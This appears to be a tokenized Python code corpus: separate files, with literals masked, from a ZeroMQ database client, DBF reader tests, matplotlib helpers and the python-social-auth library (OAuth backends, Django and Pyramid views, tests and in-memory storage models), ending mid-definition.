<EOL> self . db_name = db_name <EOL> return <EOL> def disconnect ( self , * args , ** kwargs ) : <EOL> self . status == self . STATUSES . OFFLINE <EOL> self . teardown_socket ( ) <EOL> def mount ( self , db_name , * args , ** kwargs ) : <EOL> self . send ( None , '<STR_LIT>' , [ db_name ] , * args , ** kwargs ) <EOL> return <EOL> def unmount ( self , db_name , * args , ** kwargs ) : <EOL> self . send ( None , '<STR_LIT>' , [ db_name ] , * args , ** kwargs ) <EOL> return <EOL> def listdb ( self , * args , ** kwargs ) : <EOL> return self . send ( self . db_uid , '<STR_LIT>' , { } , * args , ** kwargs ) <EOL> def createdb ( self , key , db_options = None , * args , ** kwargs ) : <EOL> db_options = db_options or { } <EOL> self . send ( self . db_uid , '<STR_LIT>' , [ key , db_options ] , * args , ** kwargs ) <EOL> return <EOL> def dropdb ( self , key , * args , ** kwargs ) : <EOL> return self . send ( self . db_uid , '<STR_LIT>' , [ key ] , * args , ** kwargs ) <EOL> def repairdb ( self , * args , ** kwargs ) : <EOL> self . send ( self . db_uid , '<STR_LIT>' , { } , * args , ** kwargs ) <EOL> return <EOL> def send ( self , db_uid , command , arguments , * args , ** kwargs ) : <EOL> orig_timeout = ms_to_sec ( self . timeout ) <EOL> timeout = kwargs . pop ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> compression = kwargs . pop ( '<STR_LIT>' , False ) <EOL> if timeout > <NUM_LIT:0> : <EOL> self . timeout = timeout <EOL> self . socket . send_multipart ( [ Request ( db_uid = db_uid , <EOL> command = command , <EOL> args = arguments , <EOL> meta = { '<STR_LIT>' : compression } ) ] , ) <EOL> try : <EOL> raw_header , raw_response = self . socket . recv_multipart ( ) <EOL> header = ResponseHeader ( raw_header ) <EOL> response = Response ( raw_response , compression = compression ) <EOL> if header . status == FAILURE_STATUS : <EOL> raise ELEVATOR_ERROR [ header . err_code ] ( header . err_msg ) <EOL> except zmq . ZMQError : <EOL> self . timeout = orig_timeout <EOL> raise TimeoutError ( "<STR_LIT>" ) <EOL> self . timeout = orig_timeout <EOL> return response . datas </s>
<s> """<STR_LIT>""" <EOL> from pytest import fixture <EOL> import datetime <EOL> from . dbf import DBF <EOL> @ fixture <EOL> def table ( ) : <EOL> return DBF ( '<STR_LIT>' ) <EOL> @ fixture <EOL> def loaded_table ( ) : <EOL> return DBF ( '<STR_LIT>' , load = True ) <EOL> records = [ { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : datetime . date ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:1> ) , <EOL> u'<STR_LIT>' : u'<STR_LIT>' } , <EOL> { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : datetime . date ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:12> ) , <EOL> u'<STR_LIT>' : u'<STR_LIT>' } ] <EOL> deleted_records = [ { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : datetime . date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) , <EOL> u'<STR_LIT>' : u'<STR_LIT>' } ] <EOL> def test_len ( ) : <EOL> assert len ( table ( ) ) == <NUM_LIT:2> <EOL> assert len ( table ( ) . deleted ) == <NUM_LIT:1> <EOL> assert len ( loaded_table ( ) ) == <NUM_LIT:2> <EOL> assert len ( loaded_table ( ) . deleted ) == <NUM_LIT:1> <EOL> def test_list ( ) : <EOL> assert list ( table ( ) ) == records <EOL> assert list ( table ( ) . deleted ) == deleted_records <EOL> assert list ( loaded_table ( ) ) == records <EOL> assert list ( loaded_table ( ) . deleted ) == deleted_records <EOL> assert not isinstance ( table ( ) , list ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import matplotlib as mpl <EOL> import matplotlib . pyplot as plt <EOL> def remove_chartjunk ( ax , spines , grid = None , ticklabels = None , show_ticks = False , <EOL> xkcd = False ) : <EOL> '''<STR_LIT>''' <EOL> all_spines = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:right>' , '<STR_LIT:left>' , '<STR_LIT>' ] <EOL> for spine in spines : <EOL> try : <EOL> ax . spines [ spine ] . set_visible ( False ) <EOL> except KeyError : <EOL> pass <EOL> if not xkcd : <EOL> for spine in set ( all_spines ) . difference ( set ( spines ) ) : <EOL> try : <EOL> ax . spines [ spine ] . set_linewidth ( <NUM_LIT:0.5> ) <EOL> except KeyError : <EOL> pass <EOL> x_pos = set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> y_pos = set ( [ '<STR_LIT:left>' , '<STR_LIT:right>' ] ) <EOL> xy_pos = [ x_pos , y_pos ] <EOL> xy_ax_names = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for ax_name , pos in zip ( xy_ax_names , xy_pos ) : <EOL> axis = ax . __dict__ [ ax_name ] <EOL> if show_ticks or axis . get_scale ( ) == '<STR_LIT>' : <EOL> for p in pos . difference ( spines ) : <EOL> axis . set_tick_params ( direction = '<STR_LIT>' ) <EOL> axis . set_ticks_position ( p ) <EOL> else : <EOL> axis . set_ticks_position ( '<STR_LIT:none>' ) <EOL> if grid is not None : <EOL> for g in grid : <EOL> assert g in ( '<STR_LIT:x>' , '<STR_LIT:y>' ) <EOL> ax . grid ( axis = grid , color = '<STR_LIT>' , linestyle = '<STR_LIT:->' , linewidth = <NUM_LIT:0.5> ) <EOL> if ticklabels is not None : <EOL> if type ( ticklabels ) is str : <EOL> assert ticklabels in set ( ( '<STR_LIT:x>' , '<STR_LIT:y>' ) ) <EOL> if ticklabels == '<STR_LIT:x>' : <EOL> ax . set_xticklabels ( [ ] ) <EOL> if ticklabels == '<STR_LIT:y>' : <EOL> ax . set_yticklabels ( [ ] ) <EOL> else : <EOL> assert set ( ticklabels ) | set ( ( '<STR_LIT:x>' , '<STR_LIT:y>' ) ) > <NUM_LIT:0> <EOL> if '<STR_LIT:x>' in ticklabels : <EOL> ax . set_xticklabels ( [ ] ) <EOL> elif '<STR_LIT:y>' in ticklabels : <EOL> ax . set_yticklabels ( [ ] ) <EOL> def maybe_get_ax ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs : <EOL> ax = kwargs . pop ( '<STR_LIT>' ) <EOL> elif len ( args ) == <NUM_LIT:0> : <EOL> fig = plt . gcf ( ) <EOL> ax = plt . gca ( ) <EOL> elif isinstance ( args [ <NUM_LIT:0> ] , mpl . axes . Axes ) : <EOL> ax = args [ <NUM_LIT:0> ] <EOL> args = args [ <NUM_LIT:1> : ] <EOL> else : <EOL> ax = plt . gca ( ) <EOL> return ax , args , dict ( kwargs ) <EOL> def maybe_get_fig_ax ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs : <EOL> ax = kwargs . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in kwargs : <EOL> fig = kwargs . pop ( '<STR_LIT>' ) <EOL> else : <EOL> fig = plt . gcf ( ) <EOL> elif len ( args ) == <NUM_LIT:0> : <EOL> fig = plt . gcf ( ) <EOL> ax = plt . gca ( ) <EOL> elif isinstance ( args [ <NUM_LIT:0> ] , mpl . figure . Figure ) and isinstance ( args [ <NUM_LIT:1> ] , mpl . axes . Axes ) : <EOL> fig = args [ <NUM_LIT:0> ] <EOL> ax = args [ <NUM_LIT:1> ] <EOL> args = args [ <NUM_LIT:2> : ] <EOL> else : <EOL> fig , ax = plt . subplots ( <NUM_LIT:1> ) <EOL> return fig , ax , args , dict ( kwargs ) <EOL> def maybe_get_linewidth ( ** kwargs ) : <EOL> try : <EOL> key = ( set ( [ "<STR_LIT>" , "<STR_LIT>" , '<STR_LIT>' ] ) & set ( kwargs ) ) . pop ( ) <EOL> lw = kwargs [ key ] <EOL> except KeyError : <EOL> lw = <NUM_LIT> <EOL> return lw </s>
<s> def hello_command ( name , print_counter = False , repeat = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> for i in range ( repeat ) : <EOL> if print_counter : <EOL> print i + <NUM_LIT:1> , <EOL> print '<STR_LIT>' % name <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import scriptine <EOL> scriptine . run ( ) </s>
<s> from social . backends . aol import AOLOpenId as AolBackend </s>
<s> from social . backends . odnoklassniki import OdnoklassnikiOAuth2 as OdnoklassnikiBackend , OdnoklassnikiApp as OdnoklassnikiAppBackend </s>
<s> from social . pipeline . user import get_username , create_user , user_details as update_user_details <EOL> get_username , create_user , update_user_details </s>
<s> import re <EOL> from django import template <EOL> from social . backends . oauth import OAuthAuth <EOL> register = template . Library ( ) <EOL> name_re = re . compile ( r'<STR_LIT>' ) <EOL> @ register . filter <EOL> def backend_name ( backend ) : <EOL> name = backend . __class__ . __name__ <EOL> name = name . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> name = name . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> name = name . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> name = name_re . sub ( r'<STR_LIT>' , name ) <EOL> return name <EOL> @ register . filter <EOL> def backend_class ( backend ) : <EOL> return backend . name . replace ( '<STR_LIT:->' , '<STR_LIT:U+0020>' ) <EOL> @ register . filter <EOL> def icon_name ( name ) : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:username>' : '<STR_LIT:user>' , <EOL> } . get ( name , name ) <EOL> @ register . filter <EOL> def social_backends ( backends ) : <EOL> backends = [ ( name , backend ) for name , backend in backends . items ( ) <EOL> if name not in [ '<STR_LIT:username>' , '<STR_LIT:email>' ] ] <EOL> backends . sort ( key = lambda b : b [ <NUM_LIT:0> ] ) <EOL> return [ backends [ n : n + <NUM_LIT:10> ] for n in range ( <NUM_LIT:0> , len ( backends ) , <NUM_LIT:10> ) ] <EOL> @ register . filter <EOL> def legacy_backends ( backends ) : <EOL> backends = [ ( name , backend ) for name , backend in backends . items ( ) <EOL> if name in [ '<STR_LIT:username>' , '<STR_LIT:email>' ] ] <EOL> backends . sort ( key = lambda b : b [ <NUM_LIT:0> ] ) <EOL> return backends <EOL> @ register . filter <EOL> def oauth_backends ( backends ) : <EOL> backends = [ ( name , backend ) for name , backend in backends . items ( ) <EOL> if issubclass ( backend , OAuthAuth ) ] <EOL> backends . sort ( key = lambda b : b [ <NUM_LIT:0> ] ) <EOL> return backends <EOL> @ register . simple_tag ( takes_context = True ) <EOL> def associated ( context , backend ) : <EOL> user = context . get ( '<STR_LIT:user>' ) <EOL> context [ '<STR_LIT>' ] = None <EOL> if user and user . is_authenticated ( ) : <EOL> try : <EOL> context [ '<STR_LIT>' ] = user . social_auth . filter ( <EOL> provider = backend . name <EOL> ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> pass <EOL> return '<STR_LIT>' </s>
<s> from pyramid . view import view_config <EOL> @ view_config ( route_name = '<STR_LIT>' , renderer = '<STR_LIT>' ) <EOL> def home ( request ) : <EOL> return { } <EOL> @ view_config ( route_name = '<STR_LIT>' , renderer = '<STR_LIT>' ) <EOL> def done ( request ) : <EOL> return { } </s>
<s> from social . apps . django_app . tests import * </s>
<s> """<STR_LIT>""" <EOL> import ssl <EOL> from social . backends . oauth import BaseOAuth2 <EOL> class AmazonOAuth2 ( BaseOAuth2 ) : <EOL> name = '<STR_LIT>' <EOL> ID_KEY = '<STR_LIT>' <EOL> AUTHORIZATION_URL = '<STR_LIT>' <EOL> ACCESS_TOKEN_URL = '<STR_LIT>' <EOL> DEFAULT_SCOPE = [ '<STR_LIT>' ] <EOL> REDIRECT_STATE = False <EOL> ACCESS_TOKEN_METHOD = '<STR_LIT:POST>' <EOL> SSL_PROTOCOL = ssl . PROTOCOL_TLSv1 <EOL> EXTRA_DATA = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> def get_user_details ( self , response ) : <EOL> """<STR_LIT>""" <EOL> name = response . get ( '<STR_LIT:name>' ) or '<STR_LIT>' <EOL> fullname , first_name , last_name = self . get_user_names ( name ) <EOL> return { '<STR_LIT:username>' : name , <EOL> '<STR_LIT:email>' : response . get ( '<STR_LIT:email>' ) , <EOL> '<STR_LIT>' : fullname , <EOL> '<STR_LIT>' : first_name , <EOL> '<STR_LIT>' : last_name } <EOL> def user_data ( self , access_token , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> response = self . get_json ( '<STR_LIT>' , <EOL> params = { '<STR_LIT>' : access_token } ) <EOL> if '<STR_LIT>' in response : <EOL> response = { <EOL> '<STR_LIT>' : response [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> '<STR_LIT:name>' : response [ '<STR_LIT>' ] [ '<STR_LIT:Name>' ] , <EOL> '<STR_LIT:email>' : response [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> } <EOL> return response </s>
<s> """<STR_LIT>""" <EOL> from social . backends . legacy import LegacyAuth <EOL> class EmailAuth ( LegacyAuth ) : <EOL> name = '<STR_LIT:email>' <EOL> ID_KEY = '<STR_LIT:email>' <EOL> REQUIRES_EMAIL_VALIDATION = True <EOL> EXTRA_DATA = [ '<STR_LIT:email>' ] </s>
<s> """<STR_LIT>""" <EOL> from social . backends . oauth import BaseOAuth2 <EOL> class MeetupOAuth2 ( BaseOAuth2 ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> AUTHORIZATION_URL = '<STR_LIT>' <EOL> ACCESS_TOKEN_URL = '<STR_LIT>' <EOL> ACCESS_TOKEN_METHOD = '<STR_LIT:POST>' <EOL> DEFAULT_SCOPE = [ '<STR_LIT>' ] <EOL> SCOPE_SEPARATOR = '<STR_LIT:U+002C>' <EOL> REDIRECT_STATE = False <EOL> STATE_PARAMETER = '<STR_LIT:state>' <EOL> def get_user_details ( self , response ) : <EOL> """<STR_LIT>""" <EOL> fullname , first_name , last_name = self . get_user_names ( <EOL> response . get ( '<STR_LIT:name>' ) <EOL> ) <EOL> return { '<STR_LIT:username>' : response . get ( '<STR_LIT:username>' ) , <EOL> '<STR_LIT:email>' : response . get ( '<STR_LIT:email>' ) or '<STR_LIT>' , <EOL> '<STR_LIT>' : fullname , <EOL> '<STR_LIT>' : first_name , <EOL> '<STR_LIT>' : last_name } <EOL> def user_data ( self , access_token , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . get_json ( '<STR_LIT>' , <EOL> params = { '<STR_LIT>' : access_token } ) </s>
<s> """<STR_LIT>""" <EOL> import imp <EOL> import six <EOL> from social . utils import handle_http_errors <EOL> from social . backends . oauth import BaseOAuth2 <EOL> from social . exceptions import AuthFailed , AuthCanceled <EOL> class ShopifyOAuth2 ( BaseOAuth2 ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> ID_KEY = '<STR_LIT>' <EOL> EXTRA_DATA = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> REDIRECT_STATE = False <EOL> @ property <EOL> def shopifyAPI ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> fp , pathname , description = imp . find_module ( '<STR_LIT>' ) <EOL> self . _shopify_api = imp . load_module ( '<STR_LIT>' , fp , pathname , <EOL> description ) <EOL> return self . _shopify_api <EOL> def get_user_details ( self , response ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT:username>' : six . text_type ( response . get ( '<STR_LIT>' , '<STR_LIT>' ) ) . replace ( <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> } <EOL> def extra_data ( self , user , uid , response , details = None , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> data = super ( ShopifyOAuth2 , self ) . extra_data ( user , uid , response , <EOL> details , * args , ** kwargs ) <EOL> session = self . shopifyAPI . Session ( self . data . get ( '<STR_LIT>' ) . strip ( ) ) <EOL> token = session . request_token ( data [ '<STR_LIT>' ] ) <EOL> data [ '<STR_LIT>' ] = token <EOL> return dict ( data ) <EOL> def auth_url ( self ) : <EOL> key , secret = self . get_key_and_secret ( ) <EOL> self . shopifyAPI . Session . setup ( api_key = key , secret = secret ) <EOL> scope = self . get_scope ( ) <EOL> state = self . state_token ( ) <EOL> self . strategy . session_set ( self . name + '<STR_LIT>' , state ) <EOL> redirect_uri = self . get_redirect_uri ( state ) <EOL> session = self . shopifyAPI . Session ( self . data . get ( '<STR_LIT>' ) . strip ( ) ) <EOL> return session . create_permission_url ( <EOL> scope = scope , <EOL> redirect_uri = redirect_uri <EOL> ) <EOL> @ handle_http_errors <EOL> def auth_complete ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . process_error ( self . data ) <EOL> access_token = None <EOL> key , secret = self . get_key_and_secret ( ) <EOL> try : <EOL> shop_url = self . data . get ( '<STR_LIT>' ) <EOL> self . shopifyAPI . Session . setup ( api_key = key , secret = secret ) <EOL> shopify_session = self . shopifyAPI . Session ( shop_url , self . data ) <EOL> access_token = shopify_session . token <EOL> except self . shopifyAPI . ValidationException : <EOL> raise AuthCanceled ( self ) <EOL> else : <EOL> if not access_token : <EOL> raise AuthFailed ( self , '<STR_LIT>' ) <EOL> return self . do_auth ( access_token , shop_url , shopify_session . url , <EOL> * args , ** kwargs ) <EOL> def do_auth ( self , access_token , shop_url , website , * args , ** kwargs ) : <EOL> kwargs . update ( { <EOL> '<STR_LIT>' : self , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : shop_url , <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( website ) , <EOL> '<STR_LIT>' : access_token <EOL> } <EOL> } ) <EOL> return self . strategy . authenticate ( * args , ** kwargs ) </s>
<s> from social . backends . oauth import BaseOAuth1 <EOL> class WithingsOAuth ( BaseOAuth1 ) : <EOL> name = '<STR_LIT>' <EOL> AUTHORIZATION_URL = '<STR_LIT>' <EOL> REQUEST_TOKEN_URL = '<STR_LIT>' <EOL> ACCESS_TOKEN_URL = '<STR_LIT>' <EOL> ID_KEY = '<STR_LIT>' <EOL> def get_user_details ( self , response ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : response [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> '<STR_LIT:email>' : '<STR_LIT>' } </s>
<s> from social . utils import module_member <EOL> _current_strategy_getter = None <EOL> def get_strategy ( strategy , storage , * args , ** kwargs ) : <EOL> Strategy = module_member ( strategy ) <EOL> Storage = module_member ( storage ) <EOL> return Strategy ( Storage , * args , ** kwargs ) <EOL> def set_current_strategy_getter ( func ) : <EOL> global _current_strategy_getter <EOL> _current_strategy_getter = func <EOL> def get_current_strategy ( ) : <EOL> global _current_strategy_getter <EOL> if _current_strategy_getter is not None : <EOL> return _current_strategy_getter ( ) </s>
<s> import json <EOL> import datetime <EOL> import time <EOL> from httpretty import HTTPretty <EOL> from social . actions import do_disconnect <EOL> from social . backends . oauth import BaseOAuth2 <EOL> from social . exceptions import AuthForbidden <EOL> from social . tests . models import User <EOL> from social . tests . backends . oauth import OAuth2Test <EOL> class DummyOAuth2 ( BaseOAuth2 ) : <EOL> name = '<STR_LIT>' <EOL> AUTHORIZATION_URL = '<STR_LIT>' <EOL> ACCESS_TOKEN_URL = '<STR_LIT>' <EOL> REVOKE_TOKEN_URL = '<STR_LIT>' <EOL> REVOKE_TOKEN_METHOD = '<STR_LIT:GET>' <EOL> EXTRA_DATA = [ <EOL> ( '<STR_LIT:id>' , '<STR_LIT:id>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , True ) , <EOL> '<STR_LIT:url>' <EOL> ] <EOL> def get_user_details ( self , response ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT:username>' : response . get ( '<STR_LIT:username>' ) , <EOL> '<STR_LIT:email>' : response . get ( '<STR_LIT:email>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : response . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : response . get ( '<STR_LIT>' , '<STR_LIT>' ) } <EOL> def user_data ( self , access_token , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . get_json ( '<STR_LIT>' , params = { <EOL> '<STR_LIT>' : access_token <EOL> } ) <EOL> class DummyOAuth2Test ( OAuth2Test ) : <EOL> backend_path = '<STR_LIT>' <EOL> user_data_url = '<STR_LIT>' <EOL> expected_username = '<STR_LIT>' <EOL> access_token_body = json . dumps ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> user_data_body = json . dumps ( { <EOL> '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' <EOL> } ) <EOL> def test_login ( self ) : <EOL> self . do_login ( ) <EOL> def test_partial_pipeline ( self ) : <EOL> self . do_partial_pipeline ( ) <EOL> def test_tokens ( self ) : <EOL> user = self . do_login ( ) <EOL> self . assertEqual ( user . social [ <NUM_LIT:0> ] . access_token , '<STR_LIT>' ) <EOL> def test_revoke_token ( self ) : <EOL> self . strategy . set_settings ( { <EOL> '<STR_LIT>' : True <EOL> } ) <EOL> self . do_login ( ) <EOL> user = User . get ( self . expected_username ) <EOL> user . password = '<STR_LIT:password>' <EOL> HTTPretty . register_uri ( self . _method ( self . backend . REVOKE_TOKEN_METHOD ) , <EOL> self . backend . REVOKE_TOKEN_URL , <EOL> status = <NUM_LIT:200> ) <EOL> do_disconnect ( self . backend , user ) <EOL> class WhitelistEmailsTest ( DummyOAuth2Test ) : <EOL> def test_valid_login ( self ) : <EOL> self . strategy . set_settings ( { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } ) <EOL> self . do_login ( ) <EOL> def test_invalid_login ( self ) : <EOL> self . strategy . set_settings ( { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } ) <EOL> with self . assertRaises ( AuthForbidden ) : <EOL> self . do_login ( ) <EOL> class WhitelistDomainsTest ( DummyOAuth2Test ) : <EOL> def test_valid_login ( self ) : <EOL> self . strategy . set_settings ( { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } ) <EOL> self . do_login ( ) <EOL> def test_invalid_login ( self ) : <EOL> self . strategy . set_settings ( { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } ) <EOL> with self . assertRaises ( AuthForbidden ) : <EOL> self . do_login ( ) <EOL> DELTA = datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> class ExpirationTimeTest ( DummyOAuth2Test ) : <EOL> user_data_body = json . dumps ( { <EOL> '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : time . mktime ( ( datetime . datetime . utcnow ( ) + <EOL> DELTA ) . timetuple ( ) ) <EOL> } ) <EOL> def test_expires_time ( self ) : <EOL> user = self . do_login ( ) <EOL> social = user . social [ <NUM_LIT:0> ] <EOL> expiration = social . expiration_datetime ( ) <EOL> self . assertEqual ( expiration <= DELTA , True ) </s>
<s> import json <EOL> from social . tests . backends . oauth import OAuth2Test <EOL> class QiitaOAuth2Test ( OAuth2Test ) : <EOL> backend_path = '<STR_LIT>' <EOL> user_data_url = '<STR_LIT>' <EOL> expected_username = '<STR_LIT>' <EOL> access_token_body = json . dumps ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> user_data_body = json . dumps ( { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' <EOL> } ) <EOL> def test_login ( self ) : <EOL> self . do_login ( ) <EOL> def test_partial_pipeline ( self ) : <EOL> self . do_partial_pipeline ( ) </s>
<s> import base64 <EOL> from social . storage . base import UserMixin , NonceMixin , AssociationMixin , CodeMixin , BaseStorage <EOL> class BaseModel ( object ) : <EOL> @ classmethod <EOL> def next_id ( cls ) : <EOL> cls . NEXT_ID += <NUM_LIT:1> <EOL> return cls . NEXT_ID - <NUM_LIT:1> <EOL> @ classmethod <EOL> def get ( cls , key ) : <EOL> return cls . cache . get ( key ) <EOL> @ classmethod <EOL> def reset_cache ( cls ) : <EOL> cls . cache = { } <EOL> class User ( BaseModel ) : <EOL> NEXT_ID = <NUM_LIT:1> <EOL> cache = { } <EOL> _is_active = True <EOL> def __init__ ( self , username , email = None , ** extra_user_fields ) : <EOL> self . id = User . next_id ( ) <EOL> self . username = username <EOL> self . email = email <EOL> self . password = None <EOL> self . slug = None <EOL> self . social = [ ] <EOL> self . extra_data = { } <EOL> self . extra_user_fields = extra_user_fields <EOL> self . save ( ) <EOL> def is_active ( self ) : <EOL> return self . _is_active <EOL> @ classmethod <EOL> def set_active ( cls , is_active = True ) : <EOL> cls . _is_active = is_active <EOL> def set_password ( self , password ) : <EOL> self . password = password <EOL> def save ( self ) : <EOL> User . cache [ self . username ] = self <EOL> class TestUserSocialAuth ( UserMixin , BaseModel ) : <EOL> NEXT_ID = <NUM_LIT:1> <EOL> cache = { } <EOL> cache_by_uid = { } <EOL> def __init__ ( self , user , provider , uid , extra_data = None ) : <EOL> self . id = TestUserSocialAuth . next_id ( ) <EOL> self . user = user <EOL> self . provider = provider <EOL> self . uid = uid <EOL> self . extra_data = extra_data or { } <EOL> self . user . social . append ( self ) <EOL> TestUserSocialAuth . cache_by_uid [ uid ] = self <EOL> def save ( self ) : <EOL> pass <EOL> @ classmethod <EOL> def reset_cache ( cls ) : <EOL> cls . cache = { } <EOL> cls . cache_by_uid = { } <EOL> @ classmethod <EOL> def changed ( cls , user ) : <EOL> pass <EOL> @ classmethod <EOL> def get_username ( cls , user ) : <EOL> return user . username <EOL> @ classmethod <EOL> def user_model ( cls ) : <EOL> return User <EOL> @ classmethod <EOL> def username_max_length ( cls ) : <EOL> return <NUM_LIT> <EOL> @ classmethod <EOL> def allowed_to_disconnect ( cls , user , backend_name , association_id = None ) : <EOL> return user . password or len ( user . social ) > <NUM_LIT:1> <EOL> @ classmethod <EOL> def disconnect ( cls , entry ) : <EOL> cls . cache . pop ( entry . id , None ) <EOL> entry . user . social = [ s for s in entry . user . social if entry != s ] <EOL> @ classmethod <EOL> def user_exists ( cls , username ) : <EOL> return User . cache . get ( username ) is not None <EOL> @ classmethod <EOL> def create_user ( cls , username , email = None , ** extra_user_fields ) : <EOL> return User ( username = username , email = email , ** extra_user_fields ) <EOL> @ classmethod <EOL> def get_user ( cls , pk ) : <EOL> for username , user in User . cache . items ( ) : <EOL> if user . id == pk : <EOL> return user <EOL> @ classmethod <EOL> def get_social_auth ( cls , provider , uid ) : <EOL> social_user = cls . cache_by_uid . get ( uid ) <EOL> if social_user and social_user . provider == provider : <EOL> return social_user <EOL> @ classmethod <EOL> def get_social_auth_for_user ( cls , user , provider = None , id = None ) : <EOL> return [ usa for usa in user . social <EOL> if provider in ( None , usa . provider ) and <EOL> id in ( None , usa . id ) ] <EOL> @ classmethod <EOL> def create_social_auth ( cls , user , uid , provider ) : <EOL> return cls ( user = user , provider = provider , uid = uid ) <EOL> @ classmethod <EOL> def get_users_by_email ( cls , email ) : <EOL> return [ user for user in User . cache . values ( ) if user . email == email ] <EOL> class TestNonce ( NonceMixin , BaseModel ) : <EOL> NEXT_ID = <NUM_LIT:1> <EOL> cache = { } <EOL> def __init__ ( self , server_url , timestamp , salt ) : <EOL> self . id = TestNonce . next_id ( ) <EOL> self . server_url = server_url <EOL> self . timestamp = timestamp <EOL> self . salt = salt <EOL> @ classmethod <EOL> def use ( cls , server_url , timestamp , salt ) : <EOL> nonce = TestNonce ( server_url , timestamp , salt ) <EOL> TestNonce . cache [ server_url ] = nonce <EOL> return nonce <EOL> class TestAssociation ( AssociationMixin , BaseModel ) : <EOL> NEXT_ID = <NUM_LIT:1> <EOL> cache = { } <EOL> def __init__ ( self , server_url , handle ) : <EOL> self . id = TestAssociation . next_id ( ) <EOL> self . server_url = server_url <EOL> self . handle = handle <EOL> def save ( self ) : <EOL> TestAssociation . cache [ ( self . server_url , self . handle ) ] = self <EOL> @ classmethod <EOL> def store ( cls , server_url , association ) : <EOL> assoc = TestAssociation . cache . get ( ( server_url , association . handle ) ) <EOL> if assoc is None : <EOL> assoc = TestAssociation ( server_url = server_url , <EOL> handle = association . handle ) <EOL> assoc . secret = base64 . encodestring ( association . secret ) <EOL> assoc . issued = association . issued <EOL> assoc . lifetime = association . lifetime <EOL> assoc . assoc_type = association . assoc_type <EOL> assoc . save ( ) <EOL> @ classmethod <EOL> def 